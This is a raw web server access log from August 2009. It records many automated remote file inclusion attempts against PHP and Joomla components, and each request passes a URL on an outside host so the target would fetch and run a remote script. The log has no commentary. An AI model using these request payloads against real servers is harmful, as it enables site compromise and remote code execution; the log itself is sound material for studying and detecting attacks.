70.85.192.194 - - [15/Aug/2009:23:49:38 -0500] "GET /administrator/components/com_multibanners/index_pr%20incipal.php?pagina=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
70.85.192.194 - - [15/Aug/2009:23:49:38 -0500] "GET /logs/administrator/components/com_multibanners/index_pr%20incipal.php?pagina=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
70.85.192.194 - - [15/Aug/2009:23:49:38 -0500] "GET /logs/access_log.1236038400/administrator/components/com_multibanners/index_pr%20incipal.php?pagina=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
70.85.192.194 - - [15/Aug/2009:23:49:44 -0500] "GET /administrator/components/com_multibanners/index_pr%20incipal.php?pagina=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
70.85.192.194 - - [15/Aug/2009:23:49:44 -0500] "GET /logs/access_log.1236038400/administrator/components/com_multibanners/index_pr%20incipal.php?pagina=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
70.85.192.194 - - [15/Aug/2009:23:49:45 -0500] "GET /logs/administrator/components/com_multibanners/index_pr%20incipal.php?pagina=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
195.225.168.186 - - [15/Aug/2009:23:50:10 -0500] "GET /logs/errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.225.168.186 - - [15/Aug/2009:23:50:11 -0500] "GET /errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
195.225.168.186 - - [15/Aug/2009:23:50:11 -0500] "GET /logs/access_log.1237507200/errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.225.168.186 - - [15/Aug/2009:23:51:00 -0500] "GET /logs/errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.225.168.186 - - [15/Aug/2009:23:51:00 -0500] "GET /logs/access_log.1237507200/errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.225.168.186 - - [15/Aug/2009:23:51:00 -0500] "GET /errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
207.158.22.128 - - [15/Aug/2009:23:51:45 -0500] "GET //galeria.php?start=0&kategoria=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
207.158.22.128 - - [15/Aug/2009:23:51:45 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
207.158.22.128 - - [15/Aug/2009:23:51:45 -0500] "GET /logs/access_log.1247788800//galeria.php?start=0&kategoria=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.158.22.128 - - [15/Aug/2009:23:51:45 -0500] "GET /logs/access_log.1246924800//galeria.php?start=0&kategoria=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.158.22.128 - - [15/Aug/2009:23:51:45 -0500] "GET //galeria.php?start=0&kategoria=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
207.158.22.128 - - [15/Aug/2009:23:51:45 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
207.158.22.128 - - [15/Aug/2009:23:51:45 -0500] "GET /logs/access_log.1247788800//galeria.php?start=0&kategoria=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.158.22.128 - - [15/Aug/2009:23:51:45 -0500] "GET /logs/access_log.1246924800//galeria.php?start=0&kategoria=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
110.45.144.23 - - [15/Aug/2009:23:51:46 -0500] "GET /logs/access_log.1241049600%20%20//include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
110.45.144.23 - - [15/Aug/2009:23:51:46 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
110.45.144.23 - - [15/Aug/2009:23:51:46 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
195.225.168.186 - - [15/Aug/2009:23:51:52 -0500] "GET /errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
195.225.168.186 - - [15/Aug/2009:23:51:52 -0500] "GET /logs/errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.225.168.186 - - [15/Aug/2009:23:51:52 -0500] "GET /logs/access_log.1237507200/errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
174.133.233.26 - - [15/Aug/2009:23:52:22 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.133.233.26 - - [15/Aug/2009:23:52:22 -0500] "GET /logs/access_log.1244505600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
174.133.233.26 - - [15/Aug/2009:23:52:22 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
174.133.233.26 - - [15/Aug/2009:23:52:25 -0500] "GET /logs/access_log.1243728000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
195.225.168.186 - - [15/Aug/2009:23:53:01 -0500] "GET /logs/errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.225.168.186 - - [15/Aug/2009:23:53:01 -0500] "GET /errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
195.225.168.186 - - [15/Aug/2009:23:53:01 -0500] "GET /logs/access_log.1237507200/errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.225.168.186 - - [15/Aug/2009:23:53:05 -0500] "GET /logs/access_log.1236470400/errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
70.85.192.194 - - [15/Aug/2009:23:53:42 -0500] "GET /logs/access_log.1239321600/administrator/components/com_multibanners/index_pr%20incipal.php?pagina=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
70.85.192.194 - - [15/Aug/2009:23:53:43 -0500] "GET /logs/access_log.1239321600/administrator/components/com_multibanners/index_pr%20incipal.php?pagina=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
91.194.250.221 - - [15/Aug/2009:23:53:52 -0500] "GET /logs/errors.php?error=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
91.194.250.221 - - [15/Aug/2009:23:53:52 -0500] "GET /errors.php?error=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
91.194.250.221 - - [15/Aug/2009:23:53:52 -0500] "GET /logs/access_log.1231200000/errors.php?error=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
195.225.168.186 - - [15/Aug/2009:23:54:24 -0500] "GET /logs/access_log.1236470400/errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.27.203.107 - - [15/Aug/2009:23:55:18 -0500] "GET /logs/access_log.1241049600%20%20//include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.27.203.107 - - [15/Aug/2009:23:55:18 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.27.203.107 - - [15/Aug/2009:23:55:18 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
195.225.168.186 - - [15/Aug/2009:23:55:25 -0500] "GET /logs/access_log.1236470400/errors.php?error=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
203.173.40.87 - - [15/Aug/2009:23:56:00 -0500] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.medisite.fr/id???? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
203.173.40.87 - - [15/Aug/2009:23:56:00 -0500] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.medisite.fr/id???? HTTP/1.1" 404 354 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
124.158.127.241 - - [15/Aug/2009:23:56:18 -0500] "GET /logs/access_log.1248134400/port.php?content=http://aboutav.com//o/id2.txt????? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
124.158.127.241 - - [15/Aug/2009:23:56:18 -0500] "GET /port.php?content=http://aboutav.com//o/id2.txt????? HTTP/1.1" 404 291 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
124.158.127.241 - - [15/Aug/2009:23:56:22 -0500] "GET /logs/port.php?content=http://aboutav.com//o/id2.txt????? HTTP/1.1" 404 296 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
124.158.127.241 - - [15/Aug/2009:23:56:24 -0500] "GET /logs/access_log.1248134400/port.php?content=http://aboutav.com//o/id2.txt????? HTTP/1.1" 404 318 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
124.158.127.241 - - [15/Aug/2009:23:56:24 -0500] "GET /port.php?content=http://aboutav.com//o/id2.txt????? HTTP/1.1" 404 291 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
124.158.127.241 - - [15/Aug/2009:23:56:24 -0500] "GET /logs/port.php?content=http://aboutav.com//o/id2.txt????? HTTP/1.1" 404 296 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
70.85.192.194 - - [15/Aug/2009:23:58:10 -0500] "GET /logs/access_log.1241049600/administrator/components/com_multibanners/index_pr%20incipal.php?pagina=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
211.202.2.220 - - [15/Aug/2009:23:59:26 -0500] "GET /logs/access_log.1236038400%22%20target=%22_blank//config/dbutil.bck.php?confdir=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 348 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.202.2.220 - - [15/Aug/2009:23:59:26 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.202.2.220 - - [15/Aug/2009:23:59:27 -0500] "GET //config/dbutil.bck.php?confdir=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
81.180.117.140 - - [16/Aug/2009:00:02:47 -0500] "GET /logs//common/db.php?commonpath=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
81.180.117.140 - - [16/Aug/2009:00:02:47 -0500] "GET //common/db.php?commonpath=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
81.180.117.140 - - [16/Aug/2009:00:03:09 -0500] "GET /logs//common/db.php?commonpath=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
81.180.117.140 - - [16/Aug/2009:00:03:09 -0500] "GET //common/db.php?commonpath=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
210.218.5.234 - - [16/Aug/2009:00:04:35 -0500] "GET //config/dbutil.bck.php?confdir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:00:04:35 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:00:04:35 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:00:05:13 -0500] "GET //config/dbutil.bck.php?confdir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:00:05:20 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:00:05:25 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:00:05:59 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:00:05:59 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:00:06:04 -0500] "GET //config/dbutil.bck.php?confdir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
70.85.192.194 - - [16/Aug/2009:00:06:26 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
70.85.192.194 - - [16/Aug/2009:00:06:26 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
70.85.192.194 - - [16/Aug/2009:00:06:26 -0500] "GET /logs/access_log.1242432000//include/mail.inc.php?skin_board_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
70.85.192.194 - - [16/Aug/2009:00:06:31 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
70.85.192.194 - - [16/Aug/2009:00:06:31 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
70.85.192.194 - - [16/Aug/2009:00:06:31 -0500] "GET /logs/access_log.1242432000//include/mail.inc.php?skin_board_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.202.2.220 - - [16/Aug/2009:00:06:39 -0500] "GET /logs/access_log.1231113600%22%20target=%22_blank//config/dbutil.bck.php?confdir=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 348 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
210.218.5.234 - - [16/Aug/2009:00:06:45 -0500] "GET //config/dbutil.bck.php?confdir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:00:06:49 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
70.85.192.194 - - [16/Aug/2009:00:06:54 -0500] "GET /logs/access_log.1233878400//include/mail.inc.php?skin_board_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:00:06:54 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
70.85.192.194 - - [16/Aug/2009:00:07:10 -0500] "GET /logs/access_log.1233878400//include/mail.inc.php?skin_board_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:08:10 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:08:10 -0500] "GET /logs/access_log.1241827200//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:08:10 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:08:13 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:08:13 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:08:13 -0500] "GET /logs/access_log.1241827200//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:00:08:19 -0500] "GET /logs/access_log.1231113600//config/dbutil.bck.php?confdir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:08:22 -0500] "GET /logs/access_log.1245110400//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:00:08:24 -0500] "GET /logs/access_log.1231113600//config/dbutil.bck.php?confdir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:08:49 -0500] "GET /logs/access_log.1245110400//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:00:08:54 -0500] "GET /logs/access_log.1231113600//config/dbutil.bck.php?confdir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
110.45.144.23 - - [16/Aug/2009:00:09:19 -0500] "GET /logs/access_log.1242432000//include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
110.45.144.23 - - [16/Aug/2009:00:09:28 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
97.107.133.144 - - [16/Aug/2009:00:09:36 -0500] "GET /become_editor.php?theme_path=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
97.107.133.144 - - [16/Aug/2009:00:09:36 -0500] "GET /logs/become_editor.php?theme_path=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
210.218.5.234 - - [16/Aug/2009:00:10:07 -0500] "GET /logs/access_log.1231113600//config/dbutil.bck.php?confdir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
114.108.177.124 - - [16/Aug/2009:00:10:17 -0500] "GET /logs/access_log.1243728000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
114.108.177.124 - - [16/Aug/2009:00:10:17 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
114.108.177.124 - - [16/Aug/2009:00:10:17 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
114.108.177.124 - - [16/Aug/2009:00:10:18 -0500] "GET /logs/access_log.1244505600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:00:10:56 -0500] "GET /logs/access_log.1242432000//include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:00:11:12 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:11:26 -0500] "GET /logs/access_log.1247184000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:11:26 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:11:26 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:00:12:20 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:00:12:20 -0500] "GET /logs/access_log.1241049600////?_SERVER[DOCUMENT_ROOT]=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:00:12:21 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 200 201283 "-""Mozilla/5.0"
218.246.20.221 - - [16/Aug/2009:00:12:26 -0500] "GET /become_editor.php?theme_path=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
218.246.20.221 - - [16/Aug/2009:00:12:26 -0500] "GET /logs/become_editor.php?theme_path=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
207.158.22.128 - - [16/Aug/2009:00:13:48 -0500] "GET /logs/access_log.1247184000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:13:49 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:00:13:49 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:00:14:08 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:00:14:08 -0500] "GET /logs/access_log.1239408000////?_SERVER[DOCUMENT_ROOT]=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:00:14:08 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 200 201283 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:00:14:21 -0500] "GET /logs/access_log.1239408000////?_SERVER[DOCUMENT_ROOT]=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:00:14:37 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:00:14:37 -0500] "GET /logs/access_log.1239408000////?_SERVER[DOCUMENT_ROOT]=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:00:14:38 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 200 201283 "-""Mozilla/5.0"
67.205.42.76 - - [16/Aug/2009:00:16:13 -0500] "GET /logs/become_editor.php?theme_path=http://abdullah.pp.ru/pbotres.txt%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
67.205.42.76 - - [16/Aug/2009:00:16:18 -0500] "GET /become_editor.php?theme_path=http://abdullah.pp.ru/pbotres.txt%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
65.55.106.112 - - [16/Aug/2009:00:17:16 -0500] "GET /logs/access_log.1171843200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
